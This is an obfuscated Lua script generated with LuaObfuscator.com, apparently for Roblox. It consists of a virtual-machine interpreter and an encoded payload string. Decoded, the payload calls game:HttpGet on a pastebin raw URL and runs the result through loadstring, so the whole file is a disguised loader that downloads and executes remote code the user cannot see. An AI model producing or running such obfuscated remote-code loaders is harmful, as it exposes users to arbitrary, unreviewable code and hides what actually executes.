--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v89=0;while true do if (v89==0) then v19=v0(v3(v30,1,1));return "";end end else local v90=0;local v91;while true do if (0==v90) then v91=v2(v0(v30,16));if v19 then local v122=0;local v123;while true do if (v122==1) then return v123;end if (0==v122) then v123=v5(v91,v19);v19=nil;v122=1;end end else return v91;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v92=0 -0 ;local v93;while true do if (v92==(877 -(282 + 595))) then v93=(v31/((5 -3)^(v32-(1 -(0 + 0)))))%((4 -(959 -(892 + 65)))^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v93-(v93%(1271 -(226 + 1044))) ;end end else local v94=2^(v32-(928 -(214 + 713))) ;return (((v31%(v94 + v94))>=v94) and 1) or (0 + 0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v36 * (469 -213)) + v35 ;end local function v23() local v37=(942 -592) -((157 -70) + 263) ;local v38;local v39;local v40;local v41;while true do if (v37==(180 -(67 + 113))) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 4 ;v37=2 -1 ;end if (v37==(1 + 0)) then return (v41 * (66680831 -49903615)) + (v40 * 65536) + (v39 * (1208 -(802 + 150))) + v38 ;end end end local function v24() local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(998 -(915 + 82))) then v45=2 -1 ;v46=(v20(v44,1 + 0 ,1158 -(116 + 1022) ) * ((2 -0)^(1219 -(1069 + 118)))) + v43 ;v42=2 + 0 + 0 ;end if (v42==(4 -2)) then v47=v20(v44,74 -53 ,31);v48=((v20(v44,69 -(101 -64) )==((7 -5) -(1 + 0))) and  -(1 + 0)) or (1 -0) ;v42=3 + 0 ;end if (v42==(794 -(368 + 423))) then if (v47==(885 -(261 + 624))) then if (v46==(0 -0)) then return v48 * (0 -0) ;else v47=19 -(8 + 2 + 8) ;v45=0 -0 ;end elseif (v47==(2489 -(416 + (1081 -(87 + 968))))) then return ((v46==(0 -0)) and (v48 * (((17 -13) -3)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(440 + 583) ) * (v45 + (v46/(((3 + 0) -1)^(490 -(145 + 293))))) ;end if (v42==(430 -(44 + 386))) then v43=v23();v44=v23();v42=(3361 -1874) -(998 + 488) ;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(1413 -(447 + 966))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;local v51={};for v67=1818 -(1703 + 114) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 786 -(265 + 521) ;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do if (v104==1) then local v118=(function() return 0;end)();while true do if (v118~=(0 -0)) then else while true do if (v95==0) then v96=(function() return v97();end)();if (v98(v96, #":", #" ")~=0) then else local v126=(function() return 0 -0 ;end)();local v127=(function() return;end)();local v128=(function() return;end)();local v129=(function() return;end)();local v130=(function() return;end)();while true do if (v126~=0) then else local v167=(function() return 0;end)();while true do if ((1 + 0)~=v167) then else v126=(function() return 1637 -(1373 + 263) ;end)();break;end if (v167==0) then v127=(function() return 1000 -(451 + 549) ;end)();v128=(function() return nil;end)();v167=(function() return 1;end)();end end end if (v126==1) then local v168=(function() return 0;end)();while true do if (v168==(1 + 0)) then v126=(function() return 2;end)();break;end if (v168~=(0 -0)) then else local v183=(function() return 0 -0 ;end)();while true do if (v183==(1384 -(746 + 638))) then v129=(function() return nil;end)();v130=(function() return nil;end)();v183=(function() return 1;end)();end if (v183==1) then v168=(function() return 1;end)();break;end end end end end if (v126==(1 + 1)) then while true do if (v127~= #">") then else local v184=(function() return 0 -0 ;end)();while true do if (v184~=(342 -(218 + 123))) then else v127=(function() return 1583 -(1535 + 46) ;end)();break;end if (v184~=(0 + 0)) then else v130=(function() return {v99(),v99(),nil,nil};end)();if (v128==(560 -(306 + 254))) then local v191=(function() return 0 + 0 ;end)();local v192=(function() return;end)();while true do if ((0 -0)==v191) then v192=(function() return 0;end)();while true do if (v192==0) then v130[ #"nil"]=(function() return v99();end)();v130[ #"0313"]=(function() return v99();end)();break;end end break;end end elseif (v128== #">") then v130[ #"91("]=(function() return v100();end)();elseif (v128==2) then v130[ #"91("]=(function() return v100() -((1469 -(899 + 568))^(11 + 5)) ;end)();elseif (v128== #"asd") then local v199=(function() return 0;end)();local v200=(function() return;end)();while true do if (0==v199) then v200=(function() return 0 -0 ;end)();while true do if (v200==0) then v130[ #"91("]=(function() return v100() -(2^(619 -(268 + 335))) ;end)();v130[ #"0313"]=(function() return v99();end)();break;end end break;end end end v184=(function() return 291 -(60 + 230) ;end)();end end end if ((574 -(426 + 146))~=v127) then else local v185=(function() return 0 + 0 ;end)();local v186=(function() return;end)();while true do if (v185==(1456 -(282 + 1174))) then v186=(function() return 811 -(569 + 242) ;end)();while true do if ((0 -0)~=v186) then else if (v98(v129, #".", #",")~= #"<") then else v130[2]=(function() return v101[v130[1 + 1 ]];end)();end if (v98(v129,1026 -(706 + 318) ,1253 -(721 + 530) )~= #".") then else v130[ #"nil"]=(function() return v101[v130[ #"xnx"]];end)();end v186=(function() return 1;end)();end if (v186~=(1272 -(945 + 326))) then else v127=(function() return  #"nil";end)();break;end end break;end end end if (v127==0) then local v187=(function() return 0 -0 ;end)();local v188=(function() return;end)();while true do if (v187==(0 + 0)) then v188=(function() return 0;end)();while true do if (v188==0) then v128=(function() return v98(v96,702 -(271 + 429) , #"gha");end)();v129=(function() return v98(v96, #".com",6);end)();v188=(function() return 1 + 0 ;end)();end if (v188~=1) then else v127=(function() return  #"/";end)();break;end end break;end end end if (v127== #"91(") then if (v98(v129, #"gha", #"91(")== #"|") then v130[ #".com"]=(function() return v101[v130[ #"asd1"]];end)();end v102[v103]=(function() return v130;end)();break;end end break;end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end end end if ((1500 -(1408 + 92))==v104) then local v119=(function() return 1086 -(461 + 625) ;end)();while true do if (v119==(1288 -(993 + 295))) then v95=(function() return 0;end)();v96=(function() return nil;end)();v119=(function() return 1 + 0 ;end)();end if (v119==(1172 -(418 + 753))) then v104=(function() return 1;end)();break;end end end end end;end)();local v53=(function() return function(v105,v106,v107) local v108=(function() return 0;end)();local v109=(function() return;end)();while true do if (v108~=0) then else v109=(function() return 0 + 0 ;end)();while true do if (v109==(0 + 0)) then local v124=(function() return 0 + 0 ;end)();local v125=(function() return;end)();while true do if (v124==0) then v125=(function() return 0;end)();while true do if (v125~=0) then else local v155=(function() return 0;end)();while true do if (v155==(0 + 0)) then v105[v106-#"<" ]=(function() return v107();end)();return v105,v106,v107;end end end end break;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"|",v58 do local v70=(function() return 529 -(406 + 123) ;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if ((1769 -(1749 + 20))~=v70) then else local v112=(function() return 0 + 0 ;end)();while true do if (0==v112) then v71=(function() return v21();end)();v72=(function() return nil;end)();v112=(function() return 1323 -(1249 + 73) ;end)();end if ((1 + 0)==v112) then v70=(function() return 1;end)();break;end end end if (v70==(1146 -(466 + 679))) then if (v71== #",") then v72=(function() return v21()~=(0 -0) ;end)();elseif (v71==2) then v72=(function() return v24();end)();elseif (v71== #"gha") then v72=(function() return v25();end)();end v59[v69]=(function() return v72;end)();break;end end end v57[ #"gha"]=(function() return v21();end)();for v73= #":",v23() do FlatIdent_69270,Descriptor,v21,v20,v22,v23,v59,v54,v73=(function() return v52(FlatIdent_69270,Descriptor,v21,v20,v22,v23,v59,v54,v73);end)();end for v74= #"\\",v23() do v55,v74,v28=(function() return v53(v55,v74,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[2 -1 ];local v65=v61[1902 -(106 + 1794) ];local v66=v61[1 + 2 ];return function(...) local v75=v64;local v76=v65;local v77=v66;local v78=v27;local v79=1 + 0 ;local v80= -(2 -1);local v81={};local v82={...};local v83=v12("#",...) -1 ;local v84={};local v85={};for v110=114 -(4 + 110) ,v83 do if ((3874==3874) and (v110>=v77)) then v81[v110-v77 ]=v82[v110 + (585 -(57 + 527)) ];else v85[v110]=v82[v110 + (1428 -(41 + 1386)) ];end end local v86=(v83-v77) + (104 -(17 + 86)) ;local v87;local v88;while true do local v111=0 + 0 ;while true do if ((v111==(0 -(0 + 0))) or (1938>4935)) then v87=v75[v79];v88=v87[1];v111=2 -1 ;end if (v111==(167 -(122 + 44))) then if ((v88<=8) or (4255<3423)) then if (v88<=(5 -2)) then if ((v88<=(3 -2)) or (3755<=915)) then if (v88>(0 + 0)) then local v131=0 + 0 ;local v132;while true do if ((0 -0)==v131) then v132=v87[67 -(30 + 35) ];v85[v132]=v85[v132](v13(v85,v132 + 1 + 0 ,v80));break;end end else local v133=v87[1259 -(1043 + (1543 -(797 + 532))) ];v85[v133]=v85[v133](v13(v85,v133 + (3 -2) ,v80));end elseif ((3946>3743) and (v88>(1214 -(323 + 889)))) then v85[v87[2]]();else v85[v87[2]]=v87[7 -4 ]~=(580 -(361 + 219)) ;end elseif ((1454<=2491) and (v88<=((237 + 88) -(18 + 35 + 267)))) then if (v88==4) then v85[v87[2]]={};else local v137=0 + (0 -0) ;local v138;local v139;local v140;local v141;while true do if (2==v137) then for v178=v138,v80 do v141=v141 + (414 -(15 + 398)) ;v85[v178]=v139[v141];end break;end if ((v137==(982 -(18 + 964))) or (1335>=3306)) then v138=v87[2];v139,v140=v78(v85[v138](v13(v85,v138 + (3 -2) ,v87[2 + 1 ])));v137=(1203 -(373 + 829)) + 0 ;end if (1==v137) then v80=(v140 + v138) -1 ;v141=(1581 -(476 + 255)) -((1150 -(369 + 761)) + 830) ;v137=2 + 0 ;end end end elseif (v88<=6) then do return;end elseif (v88==(133 -(68 + 48 + 10))) then local v158=v87[1 + (1 -0) ];local v159=v85[v87[741 -(542 + 196) ]];v85[v158 + 1 ]=v159;v85[v158]=v159[v87[(14 -6) -(242 -(64 + 174)) ]];else v85[v87[1 + 1 ]]=v87[2 + 1 ]~=0 ;end elseif (v88<=(1 + 4 + 7)) then if (v88<=(26 -16)) then if ((4844>2253) and (v88==(22 -13))) then v85[v87[2]]=v63[v87[3]];else v85[v87[1553 -(1126 + 425) ]]=v63[v87[408 -(118 + 287) ]];end elseif (v88>(43 -32)) then do return;end else v85[v87[2]]();end elseif ((452==452) and (v88<=14)) then if ((v88>(1134 -(118 + 1003))) or (4157<=2803)) then local v146=0 -0 ;local v147;local v148;while true do if (0==v146) then v147=v87[379 -(142 + 235) ];v148=v85[v87[3]];v146=4 -(3 -0) ;end if ((v146==(1 + 0)) or (4557<2087)) then v85[v147 + (978 -(553 + (760 -(144 + 192)))) ]=v148;v85[v147]=v148[v87[7 -(219 -(42 + 174)) ]];break;end end else v85[v87[2 + 0 ]]=v87[3];end elseif (v88<=15) then local v151=v87[2 + 0 ];local v152,v153=v78(v85[v151](v13(v85,v151 + 1 + 0 ,v87[2 + 0 + 1 ])));v80=(v153 + v151) -(1 + 0) ;local v154=0;for v156=v151,v80 do local v157=(0 + 0) -0 ;while true do if ((4853>=2982) and (v157==(0 -0))) then v154=v154 + (2 -1) ;v85[v156]=v152[v154];break;end end end elseif (v88==(5 + 11)) then v85[v87[2]]={};else v85[v87[2]]=v87[14 -11 ];end v79=v79 + (754 -(239 + 514)) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F3753373968375675000A4Q00107Q00120A000100013Q00120A000200023Q00200E00020002000300120D000400044Q0002000500014Q000F000200054Q000100013Q00022Q000B0001000100012Q000C3Q00017Q00",v9(),...);
